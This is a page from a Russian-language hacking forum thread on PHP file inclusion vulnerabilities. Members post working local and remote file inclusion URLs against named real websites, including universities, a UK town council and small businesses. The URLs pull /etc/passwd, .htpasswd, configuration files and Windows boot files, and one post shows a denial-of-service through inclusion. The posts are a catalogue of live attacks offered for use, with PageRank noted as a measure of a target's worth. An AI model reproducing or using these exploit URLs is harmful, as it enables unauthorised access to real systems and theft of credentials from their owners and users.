PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.comundus.net/main.php?cat=3&file=../../../../../../../../home/www/web120/html/members/.htpasswd

    PR-7
     
    _________________________
    2 people like this.
  2. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Code:
    http://www.ruffneckattack.com/shop.php?shop=../../../../../../../../../etc/passwd
    DOS через инклуд:

    Code:
    http://www.m-max.ru/page.php?open=../page.php%00
    Code:
    http://www.jtlighting.com/index.php?show_file=/home/jtlight/public_html/index.php
     
    #1122 547, 24 May 2010
    Last edited: 25 May 2010
  3. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    http://www.fmos.ru/firm.php?id=index.php
     
  4. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    Интересный инклюд:
    http://skdover.ru/main.php?id=[/b]&page=[b][inc. file name][/b][/... расширение инклюдируемого файла [b]*.Php[/b]
     
    #1124 Bb0y, 27 May 2010
    Last edited: 27 May 2010
    2 people like this.
  5. lzr

    lzr Member

    Joined:
    1 Jan 2009
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    http://www.mebel-online.ru/index.htm?File=../../../../../../../../../../etc/passwd
     
  6. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    LFI
    Code:
    http://www.claregolf.ca/page.php?page=../../../../etc/passwd
    and
    RFI
    http://www.claregolf.ca/page.php?page=[/b] пример: [code] http://www.c...age=http://forum.antichat.ru/index.php[/code]
     
  7. lzr

    lzr Member

    Joined:
    1 Jan 2009
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Code:
    http://www.stanthony-hawthorne.org/index.htm?page=../../../../../../../../../../etc/passwd
     
    #1127 lzr, 27 May 2010
    Last edited: 27 May 2010
    1 person likes this.
  8. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    Code:
    http://www.kanzleikormaier.de/vorschau.php?page=../../../../../../etc/passwd
     
  9. lzr

    lzr Member

    Joined:
    1 Jan 2009
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Code:
    http://www.edba.in.th/AboutUs/static01.php?FL=../../../../../../../../../../etc/passwd
     
    2 people like this.
  10. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://selaus.com/?pg=../index
    Заработай бабла...
     
  11. lzr

    lzr Member

    Joined:
    1 Jan 2009
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Code:
    http://www.afl.ru/index.php?c=germany&lang=ru&cont=../../../../../../../../../../../../etc/passwd
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    едушка

    http://content.hccfl.edu/pollock/PHP/lister.php?file=C:\boot.ini&linenums

    http://content.hccfl.edu/pollock/PHP/lister.php?file=C:\ntldr&linenums

    http://content.hccfl.edu/pollock/PHP/lister.php?file=C:\ntdetect.com&linenums

    allow_url_include=On Ho! php файлы не интерпретируются

    PR-6
     
    _________________________
    1 person likes this.
  13. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    http://autobus.cyclingnews.com/road/2009/apr09/roubaix09/?id=../../../../../../../../etc/passwd%00
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    Университет штата Джорджия

    http://www.rhetcomp.gsu.edu/~gpullman/3080/template.php?assignments&file=../../../../../../etc/passwd

    PR-7

    тИЦ-475

    ---------------------------------------------------
    http://www.langarts-edu.com/showfile.php?FILE=../../../../../../../../etc/hosts

    http://www.langarts-edu.com/showfile.php?FILE=../../../../../../../../etc/passwd
     
    _________________________
    #1134 Konqi, 29 May 2010
    Last edited: 29 May 2010
    1 person likes this.
  15. lzr

    lzr Member

    Joined:
    1 Jan 2009
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    http://noni-nsk.ru/new.php?n=../configuration.php

    смотри в исходный код
     
    1 person likes this.
  16. Virologist

    Virologist New Member

    Joined:
    7 May 2010
    Messages:
    3
    Likes Received:
    3
    Reputations:
    2
    http://svaltera.zp.ua/index.php?inc=../../../../../../../../etc/passwd
     
  17. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://www.humboldtschule-berlin.de/profil/profil.php?ID=../include/chinesisch

    %00 не канает.
     
  18. Virologist

    Virologist New Member

    Joined:
    7 May 2010
    Messages:
    3
    Likes Received:
    3
    Reputations:
    2
    http://rastaman.tales.ru/index.php?page=/etc/passwd%00
    http://www.bluethner.ru/modelle/mcontent.php?page=/etc/passwd - Ctrl+A ;)
    http://www.dekolink.ru/index.php?page=/etc/passwd
    http://belfilarmony.ru/index.php?page=/etc/passwd&id_news=27&year=2010
     
    1 person likes this.
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    Международная ассоциация специалистов по сельскому хозяйству

    http://www.iaald.org/index.php?page=/httpd/html/iaaldorg/www/members.php

    PR-6

    -------------------------------------------------------------------------------------
    Bishop's Stortford Town Council

    http://www.bishopsstortfordtc.gov.uk/download.php?file=../../../../../../../etc/hosts

    http://www.bishopsstortfordtc.gov.uk/download.php?file=../../../../../../../../../etc/passwd

    PR-4
     
    _________________________
    #1139 Konqi, 30 May 2010
    Last edited: 1 Jun 2010
    1 person likes this.
  20. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    Code:
    http://ballhockey.com/index.php?p=../../../../../../../etc/passwd
    and
    Code:
    http://www.chateauderazay.com/index.php?goto=../../../../../etc/hosts
    and
    Code:
    http://www.uni-selectcanada.com/eng/page.php?page_id=../../../../etc/hosts&execute=1&div_id=14
     
    1 person likes this.